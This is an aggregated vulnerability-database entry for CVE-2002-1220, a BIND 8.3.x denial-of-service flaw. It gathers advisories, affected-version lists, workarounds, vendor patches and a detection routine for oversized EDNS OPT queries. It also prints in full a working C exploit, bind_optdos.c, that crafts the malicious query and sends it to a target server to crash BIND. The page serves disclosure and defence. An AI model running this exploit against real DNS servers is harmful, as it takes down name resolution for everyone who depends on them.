CVE-2002-1220
CVSS 5.0
Published: 2002-11-29 00:00:00
Last revised: 2016-10-17 22:24:53

[Original] BIND 8.3.x through 8.3.3 allows remote attackers to cause a denial of service (termination due to assertion failure) via a request for a subdomain that does not exist, with an OPT resource record with a large UDP payload size.


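[CNNVD] ISC BIND OPT Resource Record Remote Denial of Service Vulnerability (CNNVD-200211-058)

BIND is a very widely used implementation of the DNS protocol. It is maintained by ISC (Internet Software Consortium), with the actual development carried out by Nominum (www.nominum.com).
A BIND 8 server that allows recursive queries may terminate unexpectedly because of an assertion failure. When a client requests a nonexistent subdomain of a valid domain and the DNS request carries an OPT resource record with a very large UDP payload size, BIND 8 triggers an assertion while constructing the NXDOMAIN response and the service terminates. An attacker can also cause this denial of service by querying domains whose authoritative DNS servers are unreachable.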
        

- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:isc:bind:8.3.0  ISC BIND 8.3.0
cpe:/o:freebsd:freebsd:4.4  FreeBSD 4.4
cpe:/o:freebsd:freebsd:4.5  FreeBSD 4.5
cpe:/a:isc:bind:8.3.3  ISC BIND 8.3.3
cpe:/o:openbsd:openbsd:3.0  OpenBSD 3.0
cpe:/a:isc:bind:8.3.1  ISC BIND 8.3.1
cpe:/a:isc:bind:8.3.2  ISC BIND 8.3.2
cpe:/o:freebsd:freebsd:4.6  FreeBSD 4.6
cpe:/o:freebsd:freebsd:4.7  FreeBSD 4.7
cpe:/o:openbsd:openbsd:3.2  OpenBSD 3.2
cpe:/o:openbsd:openbsd:3.1  OpenBSD 3.1

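- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:449  Bind OPT Resource Record DoS Vulnerability
* OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definition.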

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1220
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1220
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200211-058
(Official data source) CNNVD

- Other Links and Resources

http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21469
(VENDOR_ADVISORY)  ISS  20021112 Multiple Remote Vulnerabilities in BIND4 and BIND8
http://lists.apple.com/archives/Security-announce/2002/Nov/msg00000.html
(UNKNOWN)  APPLE  2002-11-21
http://marc.info/?l=bugtraq&m=103713117612842&w=2
(UNKNOWN)  BUGTRAQ  20021112 [Fwd: Notice of serious vulnerabilities in ISC BIND 4 & 8]
http://marc.info/?l=bugtraq&m=103763574715133&w=2
(UNKNOWN)  BUGTRAQ  20021118 TSLSA-2002-0076 - bind
http://online.securityfocus.com/advisories/4999
(UNKNOWN)  COMPAQ  SSRT2408
http://online.securityfocus.com/archive/1/300019
(UNKNOWN)  BUGTRAQ  20021115 [OpenPKG-SA-2002.011] OpenPKG Security Advisory (bind, bind8)
http://www.cert.org/advisories/CA-2002-31.html
(UNKNOWN)  CERT  CA-2002-31
http://www.ciac.org/ciac/bulletins/n-013.shtml
(UNKNOWN)  CIAC  N-013
http://www.debian.org/security/2002/dsa-196
(UNKNOWN)  DEBIAN  DSA-196
http://www.isc.org/products/BIND/bind-security.html
(VENDOR_ADVISORY)  CONFIRM  http://www.isc.org/products/BIND/bind-security.html
http://www.kb.cert.org/vuls/id/229595
(UNKNOWN)  CERT-VN  VU#229595
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-077.php
(UNKNOWN)  MANDRAKE  MDKSA-2002:077
http://www.securityfocus.com/bid/6161
(UNKNOWN)  BID  6161
http://xforce.iss.net/xforce/xfdb/10332
(UNKNOWN)  XF  bind-opt-rr-dos(10332)

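- Vulnerability Information

ISC BIND OPT Resource Record Remote Denial of Service Vulnerability
Medium severity  Other
2002-11-29 00:00:00 2005-05-13 00:00:00
Remote

BIND is a very widely used implementation of the DNS protocol. It is maintained by ISC (Internet Software Consortium), with the actual development carried out by Nominum (www.nominum.com).
A BIND 8 server that allows recursive queries may terminate unexpectedly because of an assertion failure. When a client requests a nonexistent subdomain of a valid domain and the DNS request carries an OPT resource record with a very large UDP payload size, BIND 8 triggers an assertion while constructing the NXDOMAIN response and the service terminates. An attacker can also cause this denial of service by querying domains whose authoritative DNS servers are unreachable.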
        

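- Advisories and Patches

        Workarounds:
        * If you do not need to provide recursive queries, you can disable them. In most cases
         recursion can be turned off; follow these steps:
         Open the BIND configuration file named.conf (for example /etc/named.conf) and add the following line to the options section:
         recursion no;
         For example:
         options {
         ...
         recursion no;
         ...
         };
         Restart the BIND service for the change to take effect.
        * Upgrade to BIND 9, for example BIND 9.2.1:
         ftp://ftp.isc.org/isc/bind9/9.2.1/bind-9.2.1.tar.gz
        Vendor patches:
        ISC
        ---
        ISC has fixed this vulnerability in BIND 4.9.11, 8.2.7 and 8.3.4. If you only want to apply a patch to your current BIND installation, the patch files are available at the following link:
        
        http://www.isc.org/products/BIND/bind-security.html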
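
The trigger described above is a query whose OPT resource record advertises a large UDP payload size. As an added example (not part of the original advisory or of ISC's code), the following C routine extracts that advertised size from a captured DNS datagram so that a monitor in front of a resolver that has not yet been upgraded can flag such queries; the 4096-byte threshold, the function names and the sample query for nx.example.com are assumptions constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define DNS_TYPE_OPT    41    /* EDNS0 OPT pseudo-RR */
#define EDNS_SIZE_LIMIT 4096  /* assumed alert threshold, not from the advisory */

static unsigned rd16(const uint8_t *p) { return ((unsigned)p[0] << 8) | p[1]; }

/* Skip a (possibly compressed) name; returns the next offset, or 0 on error. */
static size_t skip_name(const uint8_t *m, size_t len, size_t off) {
    while (off < len) {
        uint8_t l = m[off];
        if (l == 0) return off + 1;                        /* root label */
        if ((l & 0xC0) == 0xC0) return off + 2 <= len ? off + 2 : 0;
        if (l & 0xC0) return 0;                            /* reserved label type */
        off += 1 + (size_t)l;
    }
    return 0;
}

/* Advertised EDNS UDP payload size; 0 if no OPT RR, -1 if malformed. */
long edns_udp_size(const uint8_t *m, size_t len) {
    if (len < 12) return -1;
    unsigned i, qd = rd16(m + 4), rr = rd16(m + 6) + rd16(m + 8) + rd16(m + 10);
    size_t off = 12;
    for (i = 0; i < qd; i++) {                             /* question section */
        off = skip_name(m, len, off);
        if (off == 0 || off + 4 > len) return -1;
        off += 4;                                          /* QTYPE + QCLASS */
    }
    for (i = 0; i < rr; i++) {                             /* all other RRs */
        off = skip_name(m, len, off);
        if (off == 0 || off + 10 > len) return -1;
        if (rd16(m + off) == DNS_TYPE_OPT) return (long)rd16(m + off + 2); /* CLASS = size */
        off += 10 + rd16(m + off + 8);                     /* fixed fields + RDATA */
        if (off > len) return -1;
    }
    return 0;
}

/* 1 if the datagram is a query advertising more than EDNS_SIZE_LIMIT bytes. */
int is_suspicious_query(const uint8_t *m, size_t len) {
    if (len < 12 || (m[2] & 0x80)) return 0;               /* short, or a response */
    return edns_udp_size(m, len) > EDNS_SIZE_LIMIT;
}

/* Constructed sample: A query for nx.example.com, RD set, one OPT RR (size 65535). */
static const uint8_t SAMPLE[] = { 0x12,0x34, 0x01,0x00, 0,1, 0,0, 0,0, 0,1,
    2,'n','x', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0, 0,1, 0,1,
    0, 0,41, 0xFF,0xFF, 0,0,0,0, 0,0 };

/* Classify the sample after patching in a different advertised size. */
int check_sample(unsigned size) {
    uint8_t q[sizeof SAMPLE];
    memcpy(q, SAMPLE, sizeof q);
    q[35] = (uint8_t)(size >> 8); q[36] = (uint8_t)size;   /* OPT CLASS field */
    return is_suspicious_query(q, sizeof q);
}

int main(void) {
    return printf("65535: %d, 1232: %d\n", check_sample(65535), check_sample(1232)) < 0;
}
```

Legitimate EDNS clients also advertise payload sizes, so the threshold should be tuned against the sizes normally seen on the monitored network.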

- Vulnerability Information (22011)

ISC BIND 8.3.x OPT Record Large UDP Denial of Service Vulnerability (EDBID:22011)
linux dos
2002-11-12 Verified
0 spybreak
N/A
source: http://www.securityfocus.com/bid/6161/info

ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a nonexistent subdomain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail.

/*
 *
 * bind_optdos.c
 *
 * OPT DoS Remote Exploit for BIND 8.3.0 - 8.3.3-REL
 * Based on the bug disclosed by ISS
 *
 * (c) Spybreak (spybreak@host.sk)   November/2002
 *
 * Proof of concept exploit code
 * For educational and testing purposes only!
 *
 *
 * Usage: ./bind_optdos domain target [udp_size]
 *
 * domain - should be a nonexistent subdomain
 * of an existing one, different from the target's,
 * or a domain whose authoritative name servers are
 * unreachable
 *
 *
 * Greetz to: sd, g00bER and hysteria.sk ;-)
 *
 */

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>

#define         UDP_SIZE        65535
#define         OPT             41
#define         PORT            53
#define         MAXRESP         1024
#define         TIMEOUT         10

typedef struct {
        unsigned short rcode    : 4;
        unsigned short zero     : 3;
        unsigned short ra       : 1;
        unsigned short rd       : 1;
        unsigned short tc       : 1;
        unsigned short aa       : 1;
        unsigned short opcode   : 4;
        unsigned short qr       : 1;
} MSG_FLAGS;

typedef struct {
        unsigned short  id;
        unsigned short  flags;
        unsigned short  nqst;
        unsigned short  nansw;
        unsigned short  nauth;
        unsigned short  nadd;
} DNS_MSG_HDR;

void usage(char *argv0)
{
        printf("********************************************\n"
               "*    OPT DoS Exploit for BIND 8.3.[0-3]    *\n"
               "*       (c) Spybreak   November/2002       *\n"
               "********************************************\n");
        printf("\n%s domain target [udp_size]\n\n", argv0);
        exit(0);
}

void sig_alrm(int signo)
{
  printf("No response yet, the target BIND seems to be down\n");
  exit(0);
}

main(int argc, char **argv)
{
  struct sockaddr_in targ_addr;
  struct hostent *he;
  MSG_FLAGS fl;
  DNS_MSG_HDR hdr;
  unsigned char qname[512], buff[1024];
  unsigned char *bu, *dom, *dot;
  int msg_size, dom_len, sockfd, n;
  unsigned short udp_size = UDP_SIZE;
  char response[MAXRESP + 1];

  if (argc < 3)
        usage(argv[0]);
  if (argc == 4)
        udp_size = (unsigned short) atoi(argv[3]);

  if (!(he = gethostbyname(argv[2]))) {
        printf("Invalid target '%s'\n", argv[2]);
        exit(-1);
  }

  printf("Query on domain: %s\nTarget: %s\n", argv[1], argv[2]);
  printf("EDNS UDP size: %u\n", udp_size);

  if (argv[1][strlen(argv[1]) - 1] == '.')
        argv[1][strlen(argv[1]) - 1] = '\0';

  strncpy(qname + 1, argv[1], sizeof(qname) - 2);
  dom = qname;

  while (dot = (unsigned char *) strchr(dom + 1, '.')) {
        *dom = dot - dom - 1;
        dom = dot;
  }
  *dom = strlen(dom + 1);
  dom_len = dom - qname + strlen(dom + 1) + 2;

  bu = buff;

  fl.qr = 0;
  fl.opcode = 0;
  fl.aa = 0;
  fl.tc = 0;
  fl.rd = 1;
  fl.ra = 0;
  fl.zero = 0;
  fl.rcode = 0;

  srand(time(0));
  hdr.id = htons((unsigned short) (65535.0*rand()/(RAND_MAX+1.0)) + 1);
  hdr.flags = htons(*((unsigned short *) &fl));
  hdr.nqst = htons(1);
  hdr.nansw = 0;
  hdr.nauth = 0;
  hdr.nadd = htons(1);

  bcopy(&hdr, bu, sizeof(hdr));
  bu += sizeof(hdr);
  bcopy(qname, bu, dom_len);
  bu += dom_len;
  *(((unsigned short *) bu)++) = htons(1);              //query type
  *(((unsigned short *) bu)++) = htons(1);              //query class

                                                        //opt rr
  *bu++ = '\0';
  *(((unsigned short *) bu)++) = htons(OPT);            //type
  *(((unsigned short *) bu)++) = htons(udp_size);       //udp payload size
  *(((unsigned int *) bu)++) = htons(0);                //extended rcode and flags
  *(((unsigned short *) bu)++) = htons(0);              //rdlen

  msg_size = bu - buff;

  bzero(&targ_addr, sizeof(targ_addr));
  targ_addr.sin_family = AF_INET;
  targ_addr.sin_port = htons(PORT);
  targ_addr.sin_addr = *(struct in_addr *) he->h_addr;

  sockfd = socket(AF_INET, SOCK_DGRAM, 0);
  if (sockfd < 0) {
        perror("socket");
        exit(-1);
  }
  n = sendto(sockfd, buff, msg_size, 0, (struct sockaddr *) &targ_addr, (socklen_t) sizeof(targ_addr));
  if (n < 0) {
        perror("sendto");
        exit(-1);
  }

  printf("Datagram sent\nWaiting for response ...\n");

  signal(SIGALRM, sig_alrm);
  alarm(TIMEOUT);
  n = recvfrom(sockfd, response, MAXRESP, 0, NULL, NULL);
  alarm(0);

  printf("Response received, the target BIND seems to be still up\n");
  printf("Maybe the target is not an OPT DoS vulnerable BIND version,recursion disabled, or try to change domain/udp_size, ...\n");
  exit(0);
}

		

- Vulnerability Information

9724
ISC BIND OPT Resource Record Large UDP Payload DoS
Denial of Service
Loss of Availability

- Vulnerability Description

Unknown or Incomplete

- Timeline

2002-11-12 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

ISC BIND OPT Record Large UDP Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 6161
Yes No
2002-11-12 12:00:00 2009-07-11 07:16:00
Discovery of this vulnerability credited to Neel Mehta of ISS X-Force.

- Affected Versions

Sun Solaris 9
Sun Cobalt RaQ XTR
SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
ISC BIND 8.3.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ Apple Mac OS X Server 10.0
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ OpenPKG OpenPKG 1.1
+ OpenPKG OpenPKG Current
ISC BIND 8.3.2
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
ISC BIND 8.3.1
ISC BIND 8.3.0
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.24
HP HP-UX 10.20
HP HP-UX 10.10
FreeBSD FreeBSD 4.7
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4
Compaq Tru64 5.1 b PK1 (BL1)
Compaq Tru64 5.1 b
Compaq Tru64 5.1 a PK3 (BL3)
Compaq Tru64 5.1 a PK2 (BL2)
Compaq Tru64 5.1 a PK1 (BL1)
Compaq Tru64 5.1 a
Compaq Tru64 5.1 PK5 (BL19)
Compaq Tru64 5.1 PK4 (BL18)
Compaq Tru64 5.1 PK3 (BL17)
Compaq Tru64 5.1
Compaq Tru64 5.0 a PK3 (BL17)
Compaq Tru64 5.0 a
Compaq Tru64 4.0 g PK3 (BL17)
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f PK7 (BL18)
Compaq Tru64 4.0 f PK6 (BL17)
Compaq Tru64 4.0 f
Astaro Security Linux 3.2 11
Astaro Security Linux 3.2 10
Astaro Security Linux 3.2 00
Astaro Security Linux 2.0 30
Astaro Security Linux 2.0 27
Astaro Security Linux 2.0 26
Astaro Security Linux 2.0 25
Astaro Security Linux 2.0 24
Astaro Security Linux 2.0 23
Astaro Security Linux 2.0 16

- Unaffected Versions

ISC BIND 9.2.1
+ Caldera OpenUnix 8.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ SCO Unixware 7.1.3
ISC BIND 9.2
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ HP HP-UX 11.11
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ HP HP-UX 11.0
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
ISC BIND 9.1.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
ISC BIND 9.1.2
+ Conectiva Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
ISC BIND 9.1.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
ISC BIND 9.1
+ Caldera OpenUnix 8.0
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
ISC BIND 9.0
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
ISC BIND 8.3.4
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ S.u.S.E. Linux Personal 8.2
ISC BIND 8.2.7
ISC BIND 4.9.11
Astaro Security Linux 3.2 12

- Discussion

ISC BIND is vulnerable to a denial of service attack. When a DNS lookup is requested on a nonexistent subdomain of a valid domain and an OPT resource record with a large UDP payload is attached, the server may fail.

- Exploit

The following proof of concept code has been supplied by Spybreak <spybreak@host.sk>:

- Solution

Sun has released a security update to address this issue in the RAQ XTR. Please see the references section for further details. A fix is linked below.

SCO has released a security advisory to address this issue in OpenServer (CSSA-2003-SCO.17.1). Further information relating to obtaining and applying fixes can be found in the referenced advisory.

HP has released a revised advisory (HPSBUX0208-209(rev.15)) to address this issue in affected HP-UX systems. Customers who are affected by this issue are advised to apply appropriate patches. Further information regarding obtaining and applying patches is available in the referenced advisory.

ISC has stated that new versions of BIND will be available in the near future. Users are advised to contact ISC for further details. ISC has released patches for some versions.

HP has released an updated advisory HPSBUX0208-209(rev.14) for HP-UX systems. Preliminary updates for HP-UX 11 and 11.11 are available. Further information on obtaining and applying fixes is available in the referenced HP advisory (HPSBUX0208-209).

FreeBSD has released an advisory. Users are advised to update systems to the 4.7-STABLE branch or to the appropriate RELENG_4_x branch dated after the correction date. A patch is also available. Further details on obtaining and applying fixes can be found in the referenced advisory.

EnGarde Secure Linux has released an advisory. Further information about obtaining and applying fixes can be found in the referenced advisory.

SuSE has released an advisory. Updated packages are available. Further information about obtaining and applying fixes can be found in the referenced advisory.

Mandrake has released an advisory (MDKSA-2002:077) containing fix information. Further information about obtaining and applying fixes can be found in the referenced advisory.

Debian has released an advisory (DSA 196-1) containing fix information. Further information about obtaining and applying fixes can be found in the referenced advisory.

Conectiva has released an advisory (CLA-2002:546) containing fix information. Further information about obtaining and applying fixes can be found in the referenced advisory.

OpenPKG has released an advisory containing upgrades for this and other vulnerabilities. OpenPKG 1.0 users are advised to upgrade to the bind-8.2.6-1.0.2 package or later. OpenPKG 1.1 users are advised to upgrade to the bind8-8.3.3-1.1.1 package or later. OpenPKG CURRENT users are advised to upgrade to the bind8-8.3.3-20021114 package or later. bind-9.2.1-1.1.0 packages are also available for OpenPKG 1.1/CURRENT. Further details on obtaining and applying fixes can be found in the attached reference.

This issue is present in Astaro Security Linux versions prior to Up2Date 3.212. Up2Date 3.211 is the minimum version required for users to install Up2Date 3.212.

Trustix Secure Linux has released an advisory. Further details about obtaining and applying fixes can be found in the referenced advisory.

NetBSD has released an advisory. Details about upgrading vulnerable packages through CVS can be found in the referenced advisory.

SCO has released an advisory and fixes for OpenLinux.

SCO has released a security advisory (CSSA-2003-SCO.2). Information on obtaining and applying fixes can be found in the referenced advisory.

Sun recommends disabling recursion if not needed. Patches are available.

Apple has patched this issue in MacOS X versions 10.2.3 and later. See referenced web page for additional details.

Fixes are available:


OpenBSD OpenBSD 3.2

OpenBSD OpenBSD 3.0

Sun Cobalt RaQ XTR

Sun Solaris 9

OpenBSD OpenBSD 3.1

HP HP-UX 10.10

HP HP-UX 10.20

HP HP-UX 11.0 4

HP HP-UX 11.0

HP HP-UX 11.11

HP HP-UX 11.22

Compaq Tru64 4.0 f PK6 (BL17)

Compaq Tru64 4.0 g PK3 (BL17)

Compaq Tru64 4.0 g

Compaq Tru64 4.0 f

Compaq Tru64 4.0 f PK7 (BL18)

FreeBSD FreeBSD 4.4

FreeBSD FreeBSD 4.5

FreeBSD FreeBSD 4.6

FreeBSD FreeBSD 4.7

Compaq Tru64 5.0 a PK3 (BL17)

Compaq Tru64 5.0 a

Compaq Tru64 5.1 PK4 (BL18)

Compaq Tru64 5.1 b PK1 (BL1)

Compaq Tru64 5.1 a

Compaq Tru64 5.1

Compaq Tru64 5.1 PK5 (BL19)

Compaq Tru64 5.1 a PK1 (BL1)

Compaq Tru64 5.1 a PK2 (BL2)

Compaq Tru64 5.1 a PK3 (BL3)

Compaq Tru64 5.1 b

Compaq Tru64 5.1 PK3 (BL17)

ISC BIND 8.3.3

- References

 

 
